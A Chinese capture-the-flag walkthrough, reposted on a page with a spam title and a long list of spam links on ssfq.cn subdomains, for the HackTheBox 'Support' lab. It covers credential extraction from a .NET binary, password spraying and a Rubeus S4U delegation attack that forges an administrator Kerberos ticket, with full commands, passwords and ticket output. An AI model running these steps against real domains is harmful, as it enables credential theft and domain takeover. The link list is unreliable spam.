当前位置: 首页 > news >正文

拥有响应式网站营销型网站策划方案

news 2025/8/11 22:33:30
拥有响应式网站,营销型网站策划方案,衡阳市住房和城乡建设网站,iapp用网站做软件代码目录 连接至HTB服务器并启动靶机 信息收集 使用rustscan对靶机TCP端口进行开放扫描 将靶机TCP开放端口号提取并保存 使用nmap对靶机TCP开放端口进行脚本、服务扫描 使用nmap对靶机TCP开放端口进行漏洞、系统扫描 使用nmap对靶机常用UDP端口进行开放扫描 使用ldapsearch…

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用ldapsearch枚举靶机LDAP服务器根节点信息

使用smbmap通过匿名账户枚举靶机SMB服务共享

使用smbmap枚举support-tools共享内的文件

边界突破

使用Exeinfope查看UserInfo.exe文件编译

使用ILSpy反编译该EXE文件

使用netexec通过该密码与靶机LDAP账户匹配

在Windows环境下执行调试该EXE文件

尝试使用该EXE文件查询用户信息

使用kerbrute通过上述名单枚举靶机域内账户

使用ldapsearch对靶机LDAP服务器信息进行枚举

使用windapsearch对靶机域内用户进行枚举

使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒

使用evil-winrm通过上述凭证登录靶机Win-RM服务

权限提升

将SharpHound上传至靶机

执行该程序收集靶机域内信息

使用BloodHound对收集数据进行分析

从攻击机中上传并加载PowerView.ps1脚本

将Powermad上传至靶机

在域内新增一个计算机账户

将rubeus上传至靶机

使用rubeus通过S4U攻击模拟管理员身份伪造ST票据

使用impacket-ticketConverter转换该票据

使用impacket-psexec通过administrator票据登录靶机

连接至HTB服务器并启动靶机

分配IP:10.10.16.21

靶机IP:10.10.11.174

靶机Domain:support.htb

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.174 -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,                                                  
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.11.174

  • 需要重点关注的端口和服务

53端口:Domain服务

88端口:Kerberos服务

389端口:LDAP服务

445端口:SMB服务

5985端口:Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.174

使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.11.174

使用ldapsearch枚举靶机LDAP服务器根节点信息

ldapsearch -H ldap://10.10.11.174 -x -s base namingcontexts

使用smbmap通过匿名账户枚举靶机SMB服务共享

smbmap -u guest -H 10.10.11.174

使用smbmap枚举support-tools共享内的文件
smbmap -u guest -H 10.10.11.174 -r support-tools

  • UserInfo.exe.zip文件下载到攻击机本地
smbmap -u guest -H 10.10.11.174 -r support-tools -A UserInfo.exe.zip -download

  • 使用unzip将该压缩包解压
unzip 10.10.11.174-support-tools_UserInfo.exe.zip -d UserInfo

边界突破

使用Exeinfope查看UserInfo.exe文件编译

  • 由工具输出可知,该EXE可执行文件为.NET框架环境编译执行且未加壳
使用ILSpy反编译该EXE文件

  • 由此可得密钥和加密函数,直接扔给大模型修改为Python代码以便编译执行

import base64class Protected:_enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"_key = b"armando"@staticmethoddef get_password():# 解码 Base64 字符串encrypted_data = base64.b64decode(Protected._enc_password)decrypted_data = bytearray(encrypted_data)# 解密过程for i in range(len(decrypted_data)):decrypted_data[i] ^= Protected._key[i % len(Protected._key)] ^ 0xDF# 返回解密后的字符串return decrypted_data.decode('utf-8')# 测试
if __name__ == "__main__":password = Protected.get_password()print("Decrypted Password:", password)
  • 直接编译运行获得密码

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

使用netexec通过该密码与靶机LDAP账户匹配

netexec smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

在Windows环境下执行调试该EXE文件

.\UserInfo.exe find -first *

尝试使用该EXE文件查询用户信息
.\UserInfo.exe user -username langley.lucy

使用kerbrute通过上述名单枚举靶机域内账户

kerbrute userenum -d support.htb --dc 10.10.11.174 ./names.txt

  • 很好,全部都是域内用户但暂时没什么用因为可能不齐全

使用ldapsearch对靶机LDAP服务器信息进行枚举

ldapsearch -H ldap://10.10.11.174 -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep -C5 'info:'

  • 拿到一串看起来像密码的字符串

Ironside47pleasure40Watchful

使用windapsearch对靶机域内用户进行枚举
windapsearch -d support.htb --dc 10.10.11.174 -u 'ldap@support.htb' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -U | grep 'cn:' | cut -d' ' -f2

使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒
netexec smb 10.10.11.174 -u ./names.txt -p 'Ironside47pleasure40Watchful' --continue-on-success

账户:support

密码:Ironside47pleasure40Watchful

使用evil-winrm通过上述凭证登录靶机Win-RM服务

evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'

  • C:\Users\support\Desktop目录下找到user.txt文件

权限提升

将SharpHound上传至靶机

upload SharpHound.exe

执行该程序收集靶机域内信息
.\SharpHound.exe -c all
  • 将生成的.zip文件下载到攻击机本地
download 20250124070955_BloodHound.zip

使用BloodHound对收集数据进行分析

  • 首先查看域管理员

  • 查看非约束委派最短系统路径

  • 由图标展示可见,当前账户对DC域控制器可进行PS控制
从攻击机中上传并加载PowerView.ps1脚本
. .\PowerView.ps1
  • 查询域控制器名、靶机系统版本
Get-DomainController | Select Name,OSVersion | Format-List

*Evil-WinRM* PS C:\ProgramData> Get-DomainController | Select Name,OSVersion | Format-List


Name      : dc.support.htb
OSVersion : Windows Server 2022 Standard

  • 查询DC账户Kerberos约束委派信息
Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

*Evil-WinRM* PS C:\ProgramData> Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

  • 由输出可见,当前DC账户未被其他计算机账户配置约束委派

将Powermad上传至靶机

upload Powermad.ps1

  • 控制靶机加载该脚本
. .\Powermad.ps1
在域内新增一个计算机账户
New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)

*Evil-WinRM* PS C:\ProgramData> New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)
[+] Machine account x0da6h added

  • 赋予该计算机账户代表DC的约束委派权限
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount x0da6h$
  • 查询DC可委派的主体
Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount
  • 由输出可见,DC已允许x0da6h$进行约束委派

将rubeus上传至靶机

upload Rubeus_x64.exe
  • 使用rubeus为伪造的计算机账户x0da6h$生成域内密码哈希
.\Rubeus_x64.exe hash /password:123456 /user:x0da6h$ /domain:support.htb

    [*] Action: Calculate Password Hash(es)[*] Input password             : 123456
[*] Input username             : x0da6h$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostx0da6h.support.htb
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : 55843795AF436FD006A73ECEDE4C23C3
[*]       aes256_cts_hmac_sha1 : 0FA84858304070B093E0712973F00F1BD075DBE3A59741DBE6B5811CBBFBBF7E
[*]       des_cbc_md5          : DCAD7523D389D054
    使用rubeus通过S4U攻击模拟管理员身份伪造ST票据
    .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap

    *Evil-WinRM* PS C:\ProgramData> .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap______        _(_____ \      | |_____) )_   _| |__  _____ _   _  ___|  __  /| | | |  _ \| ___ | | | |/___)| |  \ \| |_| | |_) ) ____| |_| |___ ||_|   |_|____/|____/|_____)____/(___/v2.3.2[*] Action: S4U[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\x0da6h$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):doIFUjCCBU6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBCUwggQhoAMCARKhAwIBAqKCBBMEggQPhyxlix2lHe/rRq/6CAd4JUBFRyhxUpcnhSk7/8+DnxVqLFTNf3odDJnxP9etEV5xhGdyegJCHRvkb1eZUpW6TZKKiwhSKlfx8OiLfxOAm9En2Ufffcohn/Hg6IPSktaawLTytjHSi1E1YrhbRO3k3/Y3MG+1LZhh2kuAZvA1l+Q5xjRnqhwDsix0RWbwzb9hDr3YnaKxnQzJHSFPuQyXzogurRnEQtwVk+c4AQATty0V6JGRLpBZxvZ0hYwBHgHdYWEqFcIm5S3mNsIWwgEXpYDtXxqV0zyk1ax2RREKpiNCbJ494kpcWBKp/4nmGRH5crxJNn9bPaMUcKwAUqsA5Nus/oJrpubaWurRDLp8hHsqraEofQcbSDGbOKUre5sVN7IztOpgRPxCxx3Pz6Ih/3WMi1NFdbeWwbmKGg2w5ON3TCRDRaMO2pvhaKBEBG8Q7uUeRvx+buC0wven7MoLMG8T3r3I7UL8q6dgQITEXo5pOIjTKQ9/wnGMSiBFvMy6y2b6XZ+AKW6/NKGCvdqS+l3SV51U+YTWm6d3ngJUleeX6cEZiIJCkRHHq8BVE2K2sQN+Ed3ntynab6oFlWJIZMKoBSATqsZ1zrPomL0VnSxxLfTcKHhA4chPKTcbkXvJSwtmNNgcQdzHral4LXBxZOZmlLLQ8X81o+gLy6Uxikhk1/OkMy0IAbu68uGmgTI/h9Qw52h+PKYnbEQQyOEobd8JEKMdT0fwsxOEkQzcJ6ZLP96w5GY79ZM4K94tcEl2AL51fANX2yubL2tgwCYxfpxR6X7LpdQT4E9YBKe6KX6Dw2seFQk3LnfLz5pWpz1umQeBXRcW1YBGLYoqcLTp364G4FinFw/ceXlTi+CFvEpxR3Pm8exIG/t8mQJ6hmwm+d6bCYdw9FVD2LI35ISZr3fr7dRLazW0U7mcLbNHqrr8M/KdYp02ekcy5CPwt1P5c89YWc50eDnmgyeTtTSuwogkEEbayFbkkVRQS7d/XmTQzM23RU1gIwi8qI8+iwmIEl8SzJHYcirzyX+b7+E6qXaCSVHzzMJyOxhscCpruf9NiHDB7yUxnrZCjmDiSHg4czkwgKQhE70m0WQasWpXCl/gAcYVDP6OsChXH015PVECoO+pkY4jfImaJ0OEWb/X/Dx1HXYD4pyroIWsronaAnZHNDAC9AOVLo2SahYFPRfleAK/BzhPi53SxEvksJxhE6m+UZA7wg5cB0mybI3uPZL7ryuumUAXLzW+9kfpHSUw8fdHWdDDU2X+DWlEh7nqLHQW6MulO7ZLEL5fy/Ve9yL91iH378zNbYtm6DR5P2ZPTBhGI3FcXYFu9mG5pVNhXig9PSEpjJx3tdEcOUF3LKXymFmmxMEk+3wVOvrEaaOB0jCBz6ADAgEAooHHBIHEfYHBMIG+oIG7MIG4MIG1oBswGaADAgEXoRIEEKBoFnGD/Hs55p6pHcsvtgqhDRsLU1VQUE9SVC5IVEKiFDASoAMCAQGhCzAJGwd4MGRhNmgkowcDBQBA4QAApREYDzIwMjUwMTI1MDkwOTM3WqYRGA8yMDI1MDEyNTE5MDkzN1qnERgPMjAyNTAyMDEwOTA5MzdaqA0bC1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg==[*] Action: S4U[*] Building S4U2self request for: 'x0da6h$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'x0da6h$@SUPPORT.HTB'
[*] base64(ticket.kirbi):doIFojCCBZ6gAwIBBaEDAgEWooIEwTCCBL1hggS5MIIEtaADAgEFoQ0bC1NVUFBPUlQuSFRCohQwEqADAgEBoQswCRsHeDBkYTZoJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxr0AdAImZrMCI4ufGHn9IBevujqSPGBWzC/DQnHbOdVq8auEJJ9jEk8mcajMdKXn63FW8p/mNhwtCZQI8HjELanwwZXOKiF1aC6nooWxmGxf3ifzwVstcWx2lhHXPeBObyUMeg4axLQ4LOhXwLffx62QSvAwiZFXAg0tr2lvjf6EB6zHtMgeA435M899zKuHl7JuDpM8KTbH2sIhw1g2Ald4zEqH7cFKwWcN5k5/IpZsBXnAFLi/8vgEtItQgviiuD+fTW9m7lm/WTJLi4zi2kEppXkTvSqZGxjPrMon/2l7LabR6CkfyTW6GjbB3sOt3Cyi2I2J43uSzP27ocwEX0dDRup4kA/WOJhJquzHEFPRf4/F0M0GfwCLcR9QALjwqX4My0OMnXy5hnBqJHPk7SDw+ovFLgF8C/K3IQxFHjD0osXNRVrBvHmCD9Rw3T4Iaaav0fUYmoBpf8/CZdEyRYb+ARut7KUGpJiKj6l+uKCv+h4OowiLYKtsmAy7oTh04DytiSd+SZz8+ECOHimWzWrUjNWU6OCVr7MLwrAx2tq9PFErQ00U7LbKvxA70UxLQevNv40YlZalSMzX5UzFj5SdW1JOPAzeoFVwUZLKg+DcN+6JRnWhwg/4FVdFAjsZ0tV5JuvtNaC4cMCdGgcRmEqKPgm2hD/xo4fBNHHQm9euYmI/I4GjRT0o7g4DQovXiuHdy+zaysGFM8jRlATvYOi1mRnRVMy/oG3sTgmG7bxJQ4JqdM/r68A3NWCbBKWPagY0QyluYjaKOOYo6EforqanY3+LWR44nZAFBq41bqxdLXpBc+UxYDkvozasnMefgfiLiBjJQuhgGKNiPdwY47PFdeYFk4qOf0Tuw2LkWLjz5sgo9BpuKrRuZQDETb2PixR8BPYwQ7lm7soHB5f7Z0VWLkGGq9uWNM+7f+xd3foeV/SkQLtZaRCbvSccyFHGR2gzwNmnk90WAOU8Y+n2ihPrye+VewUDRv8My3k1t67gaz9zLf4HSeA0oR2zPSxQCeJ+Bc1UPN9sAx2Aq4B5Tg9TFnUBeDUDxq8YNr7EkdSiUIDDDAVMLnBCWILwmxnPyyjIgCteECslAW8nsElQcjUrcINrfjrjYBxgKYnhORf7o3b1O9CH6DLpY6xcikP1tJ45JGjuNBfc+0eQ2NxYVX0wKnKMhOYORYJ1ZHrg4Rl39rHQSJkdY9I7xB3bZmdqXpBi0oRjLTGnAo3EDByE6rmCs1i/BwLyOm4F0DgTKKMnDDnAxvR3ULfputthKRHNwVkKwMfdgq6Se8/W6pAs+6UYwsuTH87aTLneQvzjK5XJ9yRY5Gvk85g3qZwJEEdngY3e0XiltzoWDf/LZPqY12fwtCda8OJEVf3xAvdvCgI+QCw5HdoPBUTkzp0tJ3gI604DNMHxWqyWInbGNMGEsGWrosesxj99Ssm7WBH1s/eFanZvXrTA49Nx9CtX4YwIZvu3MoFMku9qt9ddMhAI0ix5ZYv3W5grljhm6R0iKMG+ho4HMMIHJoAMCAQCigcEEgb59gbswgbiggbUwgbIwga+gGzAZoAMCARehEgQQZpeNMgpkTWBVrobSVDrePKENGwtTVVBQT1JULkhUQqIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNTAxMjUwOTA5MzdaphEYDzIwMjUwMTI1MTkwOTM3WqcRGA8yMDI1MDIwMTA5MDkzN1qoDRsLU1VQUE9SVC5IVEKpFDASoAMCAQGhCzAJGwd4MGRhNmgk[*] Impersonating user 'administrator' to target SPN 'host/dc.support.htb'
[*] Building S4U2proxy request for service: 'host/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'host/dc.support.htb':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
[+] Ticket successfully imported!
    • 将票据进行BASE64解码后存入文件中
    echo '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' | base64 -d > administrator.kirbi

    使用impacket-ticketConverter转换该票据

    impacket-ticketConverter administrator.kirbi administrator.ccache

    • 使用ntpdate对本地机器与靶机域控制器时间进行校准同步
    ntpdate dc.support.htb
    使用impacket-psexec通过administrator票据登录靶机
    KRB5CCNAME=./administrator.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass

    • C:\Users\Administrator\Desktop目录下找到root.txt文件


    文章转载自:
    http://dinncoabkhazian.ssfq.cn
    http://dinncotrochili.ssfq.cn
    http://dinncothe.ssfq.cn
    http://dinncopunitory.ssfq.cn
    http://dinncobarrator.ssfq.cn
    http://dinnconailery.ssfq.cn
    http://dinncopneumaturia.ssfq.cn
    http://dinncomicrofolio.ssfq.cn
    http://dinncosyndrome.ssfq.cn
    http://dinncovariometer.ssfq.cn
    http://dinncomature.ssfq.cn
    http://dinncotolerance.ssfq.cn
    http://dinncoagedness.ssfq.cn
    http://dinncorailwayac.ssfq.cn
    http://dinncobiocytin.ssfq.cn
    http://dinncophyllotaxy.ssfq.cn
    http://dinncorubefacient.ssfq.cn
    http://dinncovolkskammer.ssfq.cn
    http://dinncocompliantly.ssfq.cn
    http://dinncodiffractometer.ssfq.cn
    http://dinncoquemoy.ssfq.cn
    http://dinncoedaphology.ssfq.cn
    http://dinncoradiologist.ssfq.cn
    http://dinncomoonscape.ssfq.cn
    http://dinncocheckless.ssfq.cn
    http://dinncofishworks.ssfq.cn
    http://dinncosupernatural.ssfq.cn
    http://dinnconeurocyte.ssfq.cn
    http://dinncodawdling.ssfq.cn
    http://dinncobulletin.ssfq.cn
    http://dinncotonite.ssfq.cn
    http://dinncobiowarfare.ssfq.cn
    http://dinncoconchy.ssfq.cn
    http://dinncoangiokeratoma.ssfq.cn
    http://dinncokhaph.ssfq.cn
    http://dinncoselenate.ssfq.cn
    http://dinncosustenance.ssfq.cn
    http://dinncoladylike.ssfq.cn
    http://dinncoempennage.ssfq.cn
    http://dinncoareopagite.ssfq.cn
    http://dinncoskopje.ssfq.cn
    http://dinncoimmuration.ssfq.cn
    http://dinncoepirote.ssfq.cn
    http://dinnconotifiable.ssfq.cn
    http://dinncosteeplechase.ssfq.cn
    http://dinncokathode.ssfq.cn
    http://dinncoduration.ssfq.cn
    http://dinncoorach.ssfq.cn
    http://dinncovisive.ssfq.cn
    http://dinncointerne.ssfq.cn
    http://dinncopomeranchuk.ssfq.cn
    http://dinncoamphibology.ssfq.cn
    http://dinncocraniometer.ssfq.cn
    http://dinncocapotasto.ssfq.cn
    http://dinncowaistcoat.ssfq.cn
    http://dinncocinnamon.ssfq.cn
    http://dinncobegotten.ssfq.cn
    http://dinncopotentially.ssfq.cn
    http://dinncopragmatism.ssfq.cn
    http://dinncocirsotomy.ssfq.cn
    http://dinncolim.ssfq.cn
    http://dinncohemishere.ssfq.cn
    http://dinncogolf.ssfq.cn
    http://dinncocyclopedia.ssfq.cn
    http://dinncoslater.ssfq.cn
    http://dinncolipoidal.ssfq.cn
    http://dinncoshekel.ssfq.cn
    http://dinncoodourless.ssfq.cn
    http://dinncocollimator.ssfq.cn
    http://dinncotouraine.ssfq.cn
    http://dinncomarron.ssfq.cn
    http://dinncofingerfish.ssfq.cn
    http://dinncogeographic.ssfq.cn
    http://dinncovainglorious.ssfq.cn
    http://dinncoardour.ssfq.cn
    http://dinncotow.ssfq.cn
    http://dinncoperonismo.ssfq.cn
    http://dinncobetake.ssfq.cn
    http://dinncounchurched.ssfq.cn
    http://dinncotyrosine.ssfq.cn
    http://dinncopachinko.ssfq.cn
    http://dinncoobispo.ssfq.cn
    http://dinnconitid.ssfq.cn
    http://dinncochurchianity.ssfq.cn
    http://dinncocrowbill.ssfq.cn
    http://dinncolocomobile.ssfq.cn
    http://dinncobernicle.ssfq.cn
    http://dinncowarehouse.ssfq.cn
    http://dinncohodiernal.ssfq.cn
    http://dinnconitroso.ssfq.cn
    http://dinncoservitress.ssfq.cn
    http://dinncoawesome.ssfq.cn
    http://dinncozymolytic.ssfq.cn
    http://dinncosilvicolous.ssfq.cn
    http://dinncogastriloquy.ssfq.cn
    http://dinncomicrospecies.ssfq.cn
    http://dinncodalapon.ssfq.cn
    http://dinncosizing.ssfq.cn
    http://dinncomonophyodont.ssfq.cn
    http://dinncocapsian.ssfq.cn
    http://www.dinnco.com/news/121040.html

    相关文章:

  • 科技设计公司网站模板下载it教育培训机构排名
